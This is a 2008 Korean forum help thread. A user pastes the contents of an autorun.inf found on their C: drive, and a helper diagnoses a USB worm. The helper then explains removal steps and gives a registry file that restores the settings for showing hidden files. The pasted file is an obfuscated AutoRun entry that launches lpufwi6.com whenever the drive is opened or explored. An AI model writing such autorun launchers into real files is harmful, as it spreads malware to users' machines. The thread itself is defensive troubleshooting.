|
:: 게시판
:: 이전 게시판
|
이전 질문 게시판은 새 글 쓰기를 막았습니다. [질문 게시판]을 이용바랍니다.
통합규정 1.3 이용안내 인용"Pgr은 '명문화된 삭제규정'이 반드시 필요하지 않은 분을 환영합니다.법 없이도 사는 사람, 남에게 상처를 주지 않으면서 같이 이야기 나눌 수 있는 분이면 좋겠습니다."
08/04/05 15:06
일단 시작->실행에 cmd를 치시고난뒤
나타나는 창에서 cd c:\ dir /A 로 나오는 결과에 autorun.inf 있는지 확인해주실수 있나요
08/04/05 15:17
;lAjdir953DsoalwLdjwqSk1J3AKwwfKdrnkKa54e10J7eai0
[AutoRun] ;cf2wddalKilJwHss2Lnwi0sjaCAoDjpSaaK0qd39Kfkjo2rkqkl4Ss5raZ85KrAL283doq5s2LKL3w3q4dAwfKl3kal4LoKa2idiri1L745DakswJ6pkaki4r4Si open=lpufwi6.com ;52Ls30JkskkoojsrkaS02C0rlZA445qKwwaJ74la6dilaia4sKcSwps3oiI34 shell\open\Command=lpufwi6.com ;das84a4oasdwKo6l5Jal2sk0iafj1ZDaj5 shell\open\Default=1 ;K3js5akoiAqa441aksf1A7ik5i4wrOwDK2iZle5os30waK40iqF4epIpkrLdi7jDDak4SaL39wrwswk0Jd934os2aaS4ks13iDoLsJj shell\explore\Command=lpufwi6.com ;Kd3918J3ko2 요렇게 뜨네요~
08/04/05 15:23
에에... 이 종류는 그다지 많이 안 알려진 종류 Worm인데....
음... 제가 직접 해 드릴수는 없을것 같구요, 주변의 컴퓨터 좀 한다 하는 지인 불러서 관련 프로그램 삭제를 하게 하셔야할 것 같네요. 이런 경우에 완전히 해결하려면, 기본적인 원칙은, 악성 프로그램 및 관련 파일 실행 종료 및 삭제(C:\ 루트, 시작프로그램 목록 및 system32 폴더에서 hide 속성과 system 속성 두 가지 있는 파일들의 리스트를 통해 유추 가능합니다(수정 날짜도 확인하세요)), 시작프로그램 목록에서 제거, 그리고 관련 레지스트리 복구(다음 리플에 내용 적을게요.) 정도를 해 줘야 합니다. 아 또 USB를 꽂았을때 자동실행이 실행되지 않도록 하여, 재발 방지를 하는 것도 중요하구요. 주변에 컴퓨터 자주 하는 분 있으면 쉽게 해결가능할겁니다.
08/04/05 15:24
모든 것을 다 하고 마무리 작업으로 Windows XP일 경우에는 아래와 같은 내용을 메모장에 적어서
"이름.reg" 형태로 저장하시고 실행시켜주세요. ===========이 아래 줄부터 복사하세요================== REGEDIT4 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden] "Type"="group" "Text"="숨김 파일" "HelpID"="update.hlp#51131" "Bitmap"="C:\WINDOWS\SYSTEM\SHDOC401.DLL,4" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\NOHIDDEN] "CheckedValue"=dword:00000002 "DefaultValue"=dword:00000000 "HkeyRoot"=dword:80000001 "HelpID"="update.hlp#51104" "RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "Text"="숨김 파일을 표시 안함" "Type"="radio" "ValueName"="Hidden" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\NOHIDORSYS] "CheckedValue"=dword:00000000 "DefaultValue"=dword:00000000 "HkeyRoot"=dword:80000001 "HelpID"="update.hlp#51103" "RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "Text"="숨김 또는 시스템 파일을 표시 안함" "Type"="radio" "ValueName"="Hidden" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL] "CheckedValue"=dword:00000001 "DefaultValue"=dword:00000000 "HkeyRoot"=dword:80000001 "HelpID"="update.hlp#51105" "RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "Text"="모든 파일 표시" "Type"="radio" "ValueName"="Hidden"
|
||||||||||